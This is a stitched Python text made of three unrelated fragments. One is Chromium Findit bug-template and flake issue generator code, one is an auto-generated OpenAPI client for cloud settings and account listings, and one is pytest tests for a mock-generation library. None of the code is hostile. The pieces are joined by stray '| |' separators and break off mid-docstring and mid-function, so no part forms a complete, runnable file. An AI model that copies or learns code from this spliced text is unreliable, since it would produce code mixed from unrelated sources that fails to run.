# TODO(crbug.com/902408): Once underlying data models for Flake, FlakeIssue,
# MasterFlakeAnalysis, etc. are updated to associate with each other for bug
# deduplication on a 1-bug-per-culprit level, FlakyTestIssueGenerator,
# FlakeAnalysisIssueGenerator, and FlakeDetectionIssueGenerator should all be
# merged into a single bug-filing entry point capable of handling the various
# bug updates.
# The link to the flake culprit page to encapsulate all impacted analyses by
# a common culprit.
_CULPRIT_LINK_TEMPLATE = ('https://analysis.chromium.org'
'/p/chromium/flake-portal/analysis/culprit?key={}')
# The base template for updating a bug with culprit findings.
_RESULT_WITH_CULPRIT_TEMPLATE = textwrap.dedent("""
Findit identified the culprit r{commit_position} as introducing flaky test(s)
summarized in {culprit_link}
Please revert the culprit or disable the test(s) asap. If you are the owner,
please fix!
If the culprit above is wrong, please file a bug using this link:
{wrong_result_link}
Automatically posted by the findit-for-me app (https://goo.gl/6D5FZh).""")
# The link to include with bug updates about wrong findings for users to
# report.
_WRONG_CULPRIT_LINK_TEMPLATE = (
'https://bugs.chromium.org/p/chromium/issues/entry?'
'status=Unconfirmed&'
'labels=Pri-1,Test-Findit-Wrong&'
'components=Infra%3ETest%3EFlakiness&'
'summary=%5BFindit%5D%20Flake%20Analyzer%20-%20Wrong%20culprit%20'
'r{commit_position}&comment=Link%20to%20Culprit%3A%20{culprit_link}')
# The base template for completed analyses without findings. Currently not yet
# used as analyses without findings don't update bugs.
# TODO(crbug.com/902408): Still update bugs when there are no findings so
# sheriffs or developers can disable or delete tests at their discretion.
_UNKNOWN_CULPRIT_TEMPLATE = textwrap.dedent("""
Flaky test: {test_name}
Sample failed build due to flakiness: {build_link}
Test output log: {test_output_log_link}
Analysis: {analysis_link}
This flake is either longstanding, has low flakiness, or is not reproducible.
Automatically posted by the findit-for-me app (https://goo.gl/6D5FZh).""")
# Flake detection bug templates.
_FLAKE_DETECTION_BUG_DESCRIPTION = textwrap.dedent("""
{test_name} is flaky.
Findit has detected {num_occurrences} flake occurrences of this test within the
past 24 hours. List of all flake occurrences can be found at:
{flake_url}.
Unless the culprit CL is found and reverted, please disable this test first
within 30 minutes then find an appropriate owner.
{previous_tracking_bug_text}
{footer}""")
# The base template for a detected flaky test before analysis.
_FLAKE_DETECTION_BUG_COMMENT = textwrap.dedent("""
{test_name} is flaky.
Findit has detected {num_occurrences} new flake occurrences of this test. List
of all flake occurrences can be found at:
{flake_url}.
{back_onto_sheriff_queue_message}
{previous_tracking_bug_text}
{footer}""")
_FLAKE_DETECTION_WRONG_RESULTS_BUG_LINK = (
'https://bugs.chromium.org/p/chromium/issues/entry?'
'status=Unconfirmed&labels=Pri-1,Test-Findit-Wrong&'
'components=Infra%3ETest%3EFlakiness&'
'summary=%5BFindit%5D%20Flake%20Detection%20-%20Wrong%20result%3A%20'
'{summary}&comment=Link%20to%20flake%20details%3A%20{flake_link}')
_FLAKE_DETECTION_PREVIOUS_TRACKING_BUG = (
'\nThis flaky test was previously tracked in bug {}.\n')
_FLAKE_DETECTION_FOOTER_TEMPLATE = textwrap.dedent(
"""If the result above is wrong, please file a bug using this link:
{wrong_results_bug_link}
Automatically posted by the findit-for-me app (https://goo.gl/Ne6KtC).""")
############### Below are bug templates for flake groups. ###############
# Bug template for a group of detected flakes.
_FLAKE_DETECTION_GROUP_BUG_DESCRIPTION = textwrap.dedent("""
Tests in {canonical_step_name} is flaky.
Findit has detected {num_occurrences} flake occurrences of tests below within
the past 24 hours:
{flake_list}
Please try to find and revert the culprit if the culprit is obvious.
Otherwise please find an appropriate owner.
{previous_tracking_bug_text}
""")
# Template for the comment immediately after the bug is created.
_FLAKE_DETECTION_GROUP_BUG_LINK_COMMENT = textwrap.dedent("""
List of all flake occurrences can be found at:
{flakes_url}.
{footer}""")
_BACK_ONTO_SHERIFF_QUEUE_MESSAGE = (
'Since these tests are still flaky, this issue has been moved back onto the'
' Sheriff Bug Queue if it hasn\'t already.')
_FLAKE_DETECTION_GROUP_BUG_COMMENT = textwrap.dedent("""
Findit has detected {num_occurrences} new flake occurrences of tests in this bug
within the past 24 hours.
List of all flake occurrences can be found at:
{flake_url}.
{back_onto_sheriff_queue_message}
{previous_tracking_bug_text}
{footer}""")
_DUPLICATE_FLAKE_BUG_COMMENT = textwrap.dedent("""
This flake has been identified as being introduced in r{commit_position}.
See {culprit_url} for details.
In the case that Findit's finding is wrong, please unmerge the bug.
""")
def _GenerateAnalysisLink(analysis):
"""Returns a link to Findit's result page of a MasterFlakeAnalysis."""
return ('https://analysis.chromium.org'
'/p/chromium/flake-portal/analysis/culprit?key={}').format(
analysis.key.urlsafe())
def _GenerateCulpritLink(culprit_urlsafe_key):
"""Returns a link to a FlakeCulprit page."""
return _CULPRIT_LINK_TEMPLATE.format(culprit_urlsafe_key)
def _GenerateWrongCulpritLink(culprit):
"""Returns the test with a link to file a bug agasinst a wrong result."""
return _WRONG_CULPRIT_LINK_TEMPLATE.format(
commit_position=culprit.commit_position,
culprit_link=_GenerateCulpritLink(culprit.key.urlsafe()))
def _GenerateTestOutputLogLink(analysis):
"""Generates a link to the swarming task to be surfaced to the bug.
Args:
analysis (MasterFlakeAnalysis): The analysis whose data points and swarming
tasks will be queried for surfacing to the bug.
Returns:
url (str): The url to the swarming task.
"""
task_id = analysis.GetRepresentativeSwarmingTaskId()
assert task_id, 'Representative task id unexpectedly not found!'
return swarming.GetSwarmingTaskUrl(task_id)
def _GenerateMessageText(analysis):
"""Generates the text to create or update a bug with depending on results.
Args:
analysis (MasterFlakeAnalysis): The completed analysis with results to
determine what to update the bug with.
Returns:
(str): The text to upodate the bug with.
"""
# Culprit identified.
if analysis.culprit_urlsafe_key:
culprit = ndb.Key(urlsafe=analysis.culprit_urlsafe_key).get()
assert culprit, 'Culprit is unexpectedly missing.'
culprit_link = _GenerateCulpritLink(analysis.culprit_urlsafe_key)
wrong_result_link = _GenerateWrongCulpritLink(culprit)
return _RESULT_WITH_CULPRIT_TEMPLATE.format(
commit_position=culprit.commit_position,
culprit_link=culprit_link,
wrong_result_link=wrong_result_link)
# Culprit not identified.
analysis_link = _GenerateAnalysisLink(analysis)
build_link = build_url.CreateBuildUrl(analysis.original_master_name,
analysis.original_builder_name,
analysis.original_build_number)
test_output_log_link = _GenerateTestOutputLogLink(analysis)
return _UNKNOWN_CULPRIT_TEMPLATE.format(
test_name=analysis.original_test_name,
build_link=build_link,
test_output_log_link=test_output_log_link,
analysis_link=analysis_link)
def _GetAutoAssignOwner(analysis):
"""Determines the best owner for the culprit of an analysis.
Rules for determining an owner:
1. None if no culprit.
2. Return the culprit CL author if @chromium.org or @google.com
3. TODO(crbug.com913032): Fallback to the reviewer(s) and check for
@chromium.org or @google.com.
Args:
analysis (MasterFlakeAnalysis): The analysis for whose results are to be
used to update the bug with.
Returns:
owner (str): The best-guess owner or None if not determined.
"""
if not analysis.culprit_urlsafe_key:
# No culprit, so no owner.
return None
culprit = entity_util.GetEntityFromUrlsafeKey(analysis.culprit_urlsafe_key)
assert culprit, (
'Culprit missing unexpectedly when trying to get owner for bug!')
author = git.GetAuthor(culprit.revision)
if not author:
return None
email = author.email
if email.endswith('@chromium.org') or email.endswith('@google.com'):
return email
return None
def GenerateDuplicateComment(culprit):
return _DUPLICATE_FLAKE_BUG_COMMENT.format(
commit_position=culprit.commit_position,
culprit_url=_CULPRIT_LINK_TEMPLATE.format(culprit.key.urlsafe()))
class BaseFlakeIssueGenerator(object):
"""Encapsulates details needed to create or update a Monorail issue."""
__metaclass__ = abc.ABCMeta
def __init__(self):
"""Initiates a BaseFlakeIssueGenerator object."""
# Id of the previous issue that was tracking this flaky test.
self._previous_tracking_bug_id = None
@abc.abstractmethod
def GetDescription(self):
"""Gets description for the issue to be created.
Returns:
A string representing the description.
"""
return
@abc.abstractmethod
def GetComment(self):
"""Gets a comment to post an update to the issue.
Returns:
A string representing the comment.
"""
return
@abc.abstractmethod
def ShouldRestoreChromiumSheriffLabel(self):
"""Returns True if the Sheriff label should be restored when updating bugs.
This value should be set based on whether the results of the service are
actionable. For example, for Flake Detection, once it detects new
occurrences of a flaky test, it is immediately actionable that Sheriffs
should disable the test ASAP. However, for Flake Analyzer, when the
confidence is low, the analysis results mostly only serve as FYI
information, so it would be too noisy to notify Sheriffs on every bug.
Returns:
A boolean indicates whether the Sheriff label should be restored.
"""
return
@abc.abstractmethod
def GetLabels(self):
"""Gets labels for the issue to be created.
Returns:
A list of string representing the labels.
"""
return
def _GetCommonFlakyTestLabel(self):
"""Returns a list of comment labels used for flaky tests related issues.
Args:
A list of string representing the labels.
"""
return [
issue_constants.SHERIFF_CHROMIUM_LABEL, issue_constants.TYPE_BUG_LABEL,
issue_constants.FLAKY_TEST_LABEL
]
def GetAutoAssignOwner(self):
"""Gets the owner to assign the issue to.
Can be None, in which case the owner field should not be affected.
"""
return None
def GetComponents(self):
"""Gets the components of reported flakes."""
return []
def GetStatus(self):
"""Gets status for the issue to be created.
Returns:
A string representing the status, for example: Untriaged.
"""
return 'Untriaged'
@abc.abstractmethod
def GetSummary(self):
"""Gets summary for the issue to be created.
Returns:
A string representing the summary.
"""
return
@abc.abstractmethod
def GetFlakyTestCustomizedField(self):
"""Gets customized fields for the issue to be created.
Returns:
A CustomizedField field.
"""
return
def GetPriority(self):
"""Gets priority for the issue to be created.
Defaults to P1 for all flaky tests related bugs.
Returns:
A string representing the priority of the issue. (e.g Pri-1, Pri-2)
"""
return 'Pri-1'
def GetMonorailProject(self):
"""Gets the name of the Monorail project the issue is for.
Returns:
A string representing the Monorail project.
"""
return 'chromium'
def GetPreviousTrackingBugId(self):
"""Gets the id of the previous issue that was tracking this flaky test.
Returns:
A string representing the Id of the issue.
"""
return self._previous_tracking_bug_id
def SetPreviousTrackingBugId(self, previous_tracking_bug_id):
"""Sets the id of the previous issue that was tracking this flaky test.
Args:
previous_tracking_bug_id: Id of the | |
[]
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/cloud/settings', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CloudSettings', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_cloud_access(self, **kwargs): # noqa: E501
"""list_cloud_access # noqa: E501
List all accessible cluster identifiers. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cloud_access(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:return: CloudAccessExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_cloud_access_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_cloud_access_with_http_info(**kwargs) # noqa: E501
return data
def list_cloud_access_with_http_info(self, **kwargs): # noqa: E501
"""list_cloud_access # noqa: E501
List all accessible cluster identifiers. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cloud_access_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:return: CloudAccessExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['sort', 'limit', 'dir'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_cloud_access" % key
)
params[key] = val
del params['kwargs']
if ('sort' in params and
len(params['sort']) > 255):
raise ValueError("Invalid value for parameter `sort` when calling `list_cloud_access`, length must be less than or equal to `255`") # noqa: E501
if ('sort' in params and
len(params['sort']) < 0):
raise ValueError("Invalid value for parameter `sort` when calling `list_cloud_access`, length must be greater than or equal to `0`") # noqa: E501
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_cloud_access`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_cloud_access`, must be a value greater than or equal to `1`") # noqa: E501
if ('dir' in params and
len(params['dir']) < 0):
raise ValueError("Invalid value for parameter `dir` when calling `list_cloud_access`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'dir' in params:
query_params.append(('dir', params['dir'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/cloud/access', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CloudAccessExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_cloud_accounts(self, **kwargs): # noqa: E501
"""list_cloud_accounts # noqa: E501
List all accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cloud_accounts(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:return: CloudAccountsExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_cloud_accounts_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_cloud_accounts_with_http_info(**kwargs) # noqa: E501
return data
def list_cloud_accounts_with_http_info(self, **kwargs): # noqa: E501
"""list_cloud_accounts # noqa: E501
List all accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cloud_accounts_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:return: CloudAccountsExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['sort', 'limit', 'dir'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_cloud_accounts" % key
)
params[key] = val
del params['kwargs']
if ('sort' in params and
len(params['sort']) > 255):
raise ValueError("Invalid value for parameter `sort` when calling `list_cloud_accounts`, length must be less than or equal to `255`") # noqa: E501
if ('sort' in params and
len(params['sort']) < 0):
raise ValueError("Invalid value for parameter `sort` when calling `list_cloud_accounts`, length must be greater than or equal to `0`") # noqa: E501
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_cloud_accounts`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_cloud_accounts`, must be a value greater than or equal to `1`") # noqa: E501
if ('dir' in params and
len(params['dir']) < 0):
raise ValueError("Invalid value for parameter `dir` when calling `list_cloud_accounts`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'dir' in params:
query_params.append(('dir', params['dir'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/4/cloud/accounts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CloudAccountsExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_cloud_jobs(self, **kwargs): # noqa: E501
"""list_cloud_jobs # noqa: E501
List all cloudpools jobs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cloud_jobs(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:return: CloudJobsExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_cloud_jobs_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_cloud_jobs_with_http_info(**kwargs) # noqa: E501
return data
def list_cloud_jobs_with_http_info(self, **kwargs): # noqa: E501
"""list_cloud_jobs # noqa: E501
List all cloudpools jobs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cloud_jobs_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:return: CloudJobsExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params | |
validity of generated mocks code
exec(generated +
"\nmock_b64decode.return_value.decode.return_value = '20'")
w_mock = tests.sample.code.tested_module.base_64_partial_functions(
"my msg2")
assert "20" == w_mock
def test_generate_mocks_function_list_comprehension(mocker):
wo_mock = get_square_root([1, 4, 9])
assert [1, 2, 3] == wo_mock # without mocks
expected = """# mocked dependencies
mock_sqrt = mocker.MagicMock(name='sqrt')
mocker.patch('tests.sample.code.comprehensions_and_loops.math.sqrt', new=mock_sqrt)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_sqrt, name='mock_sqrt')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK, get_square_root)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated +
"\nmock_sqrt.side_effect = [-1]*len('not a list of numbers')")
w_mock = get_square_root('not a list of numbers')
assert [-1] * len('not a list of numbers') == w_mock
def test_generate_mocks_function_list_comprehension_external_variable(mocker):
wo_mock = get_square_root_external_variable()
assert [1, 2, 3] == wo_mock # without mocks
expected = """# mocked dependencies
mock_sqrt = mocker.MagicMock(name='sqrt')
mocker.patch('tests.sample.code.comprehensions_and_loops.math.sqrt', new=mock_sqrt)
mock_external_items = mocker.MagicMock(name='external_items')
mocker.patch('tests.sample.code.comprehensions_and_loops.external_items', new=mock_external_items)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_sqrt, name='mock_sqrt')
mock_autogen.generate_asserts(mock_external_items, name='mock_external_items')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
get_square_root_external_variable)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated +
"\nmock_sqrt.side_effect = [-1]*len('not a list of numbers')"
"\nmock_external_items.__iter__.return_value = [9, 16, 25, 36]")
w_mock = get_square_root_external_variable()
assert [-1] * 4 == w_mock # we changed the number of items in the external
def test_generate_mocks_lock_external_variable(mocker, capsys):
with_statements.single_thread_dict = {}
wo_mock = with_statements.outside_lock_context("some", "value")
assert "value" == wo_mock # without mocks
wo_mock = with_statements.outside_lock_context("some", "other value")
assert "value" == wo_mock # without mocks
expected = """# mocked dependencies
mock_lock = mocker.MagicMock(name='lock')
mocker.patch('tests.sample.code.with_statements.lock', new=mock_lock)
mock_single_thread_dict = mocker.MagicMock(name='single_thread_dict')
mocker.patch('tests.sample.code.with_statements.single_thread_dict', new=mock_single_thread_dict)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_lock, name='mock_lock')
mock_autogen.generate_asserts(mock_single_thread_dict, name='mock_single_thread_dict')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
with_statements.outside_lock_context)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec("\n".join(generated_mocks) +
"\nmock_single_thread_dict.__contains__.return_value = False"
"\nmock_single_thread_dict.__getitem__.return_value = 'strange'")
w_mock = with_statements.outside_lock_context("some", "third value")
assert 'strange' == w_mock
capsys.readouterr().out # this clears the existing output
exec("\n".join(generated_asserts))
expected_mock_results = """mock_lock.__enter__.assert_called_once_with()
mock_lock.__exit__.assert_called_once_with(None, None, None)
mock_single_thread_dict.__contains__.assert_called_once_with('some')
mock_single_thread_dict.__setitem__.assert_called_once_with('some', 'third value')
mock_single_thread_dict.__getitem__.assert_called_once_with('some')
"""
assert expected_mock_results == capsys.readouterr().out
def test_generate_mocks_function_dict_comprehension(mocker):
expected = """# mocked dependencies
mock_len = mocker.MagicMock(name='len')
mocker.patch('tests.sample.code.comprehensions_and_loops.len', new=mock_len)
mock_items = mocker.MagicMock(name='items')
mocker.patch('tests.sample.code.comprehensions_and_loops.os.environ.items', new=mock_items)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_len, name='mock_len')
mock_autogen.generate_asserts(mock_items, name='mock_items')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
summarize_environ_values)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated + "\nmock_len.side_effect = range(3)" +
"\nmock_items.return_value = (('a','b'), ('c','d'), ('e','f'),)")
w_mock = summarize_environ_values()
assert {'a': 0, 'c': 1, 'e': 2} == w_mock
def test_generate_mocks_function_dict_comprehension_ignore_variables(mocker):
expected = """# mocked dependencies
mock_len = mocker.MagicMock(name='len')
mocker.patch('tests.sample.code.comprehensions_and_loops.len', new=mock_len)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_len, name='mock_len')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK, trimmed_strings)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated + "\nmock_len.return_value = 20")
w_mock = trimmed_strings(["a", "bb", "cc "])
assert {'a': 20, 'cc': 20, 'bb': 20} == w_mock
def test_generate_mocks_function_subscript(mocker):
expected = """# mocked dependencies
mock_sqrt = mocker.MagicMock(name='sqrt')
mocker.patch('tests.sample.code.subscripts.math.sqrt', new=mock_sqrt)
mock_randint = mocker.MagicMock(name='randint')
mocker.patch('tests.sample.code.subscripts.random.randint', new=mock_randint)
mock_str = mocker.MagicMock(name='str')
mocker.patch('tests.sample.code.subscripts.str', new=mock_str)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_sqrt, name='mock_sqrt')
mock_autogen.generate_asserts(mock_randint, name='mock_randint')
mock_autogen.generate_asserts(mock_str, name='mock_str')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
list_subscript_games)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated + "\nmock_sqrt.return_value = 0" +
"\nmock_randint.return_value = 0" + "\nmock_str.return_value = '7'")
my_list = [1, 2, 3, 4, 5]
list_subscript_games(my_list)
assert [-1, '7', 5] == my_list
def test_generate_mocks_function_same_function_name_different_objects(mocker):
wo_mock = get_username_and_password()
assert "some_username,some_password" == wo_mock # without mocks
expected = """# mocked dependencies
mock_get = mocker.MagicMock(name='get')
mocker.patch('tests.sample.code.same_method_name.get', new=mock_get)
mock_get_2 = mocker.MagicMock(name='get_2')
mocker.patch('tests.sample.code.same_method_name.os.environ.get', new=mock_get_2)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_get, name='mock_get')
mock_autogen.generate_asserts(mock_get_2, name='mock_get_2')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
get_username_and_password)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated + "\nmock_get.return_value = 'made_up_username'"
"\nmock_get_2.return_value = 'made_up_password'")
w_mock = get_username_and_password()
assert 'made_up_username,made_up_password' == w_mock
def test_generate_mocks_method_inner_calls(mocker):
bin_op_class_name = 'ast.BinOp' if sys.version_info >= (
3, 9) else '_ast.BinOp'
global_before = tests.sample.code.tested_module.global_counter
prop_before = tests.sample.code.tested_module.FirstClass.prop
first = tests.sample.code.tested_module.FirstClass('20')
expected = f"""# warnings
# could not convert a function call into a mock on node:
# (suffix.upper() + suffix).encode('ascii')
# Can't stringify node of type <class '{bin_op_class_name}'>
# mocked dependencies
mock_randint = mocker.MagicMock(name='randint')
mocker.patch('tests.sample.code.tested_module.random.randint', new=mock_randint)
mock_get_random_number = mocker.MagicMock(name='get_random_number')
mocker.patch('tests.sample.code.tested_module.get_random_number', new=mock_get_random_number)
mock_str = mocker.MagicMock(name='str')
mocker.patch('tests.sample.code.tested_module.str', new=mock_str)
mock_isfile = mocker.MagicMock(name='isfile')
mocker.patch('tests.sample.code.tested_module.os.path.isfile', new=mock_isfile)
mock_b64encode = mocker.MagicMock(name='b64encode')
mocker.patch('base64.b64encode', new=mock_b64encode)
mock_b64decode = mocker.MagicMock(name='b64decode')
mocker.patch('base64.b64decode', new=mock_b64decode)
mock_increase_global_counter = mocker.MagicMock(name='increase_global_counter')
mocker.patch('tests.sample.code.tested_module.FirstClass.increase_global_counter', new=mock_increase_global_counter)
mock_increase_class_counter = mocker.MagicMock(name='increase_class_counter')
mocker.patch('tests.sample.code.tested_module.FirstClass.increase_class_counter', new=mock_increase_class_counter)
mock_not_implemented = mocker.MagicMock(name='not_implemented')
mocker.patch('tests.sample.code.tested_module.FirstClass.not_implemented', new=mock_not_implemented)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_randint, name='mock_randint')
mock_autogen.generate_asserts(mock_get_random_number, name='mock_get_random_number')
mock_autogen.generate_asserts(mock_str, name='mock_str')
mock_autogen.generate_asserts(mock_isfile, name='mock_isfile')
mock_autogen.generate_asserts(mock_b64encode, name='mock_b64encode')
mock_autogen.generate_asserts(mock_b64decode, name='mock_b64decode')
mock_autogen.generate_asserts(mock_increase_global_counter, name='mock_increase_global_counter')
mock_autogen.generate_asserts(mock_increase_class_counter, name='mock_increase_class_counter')
mock_autogen.generate_asserts(mock_not_implemented, name='mock_not_implemented')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
first.using_not_implemented)
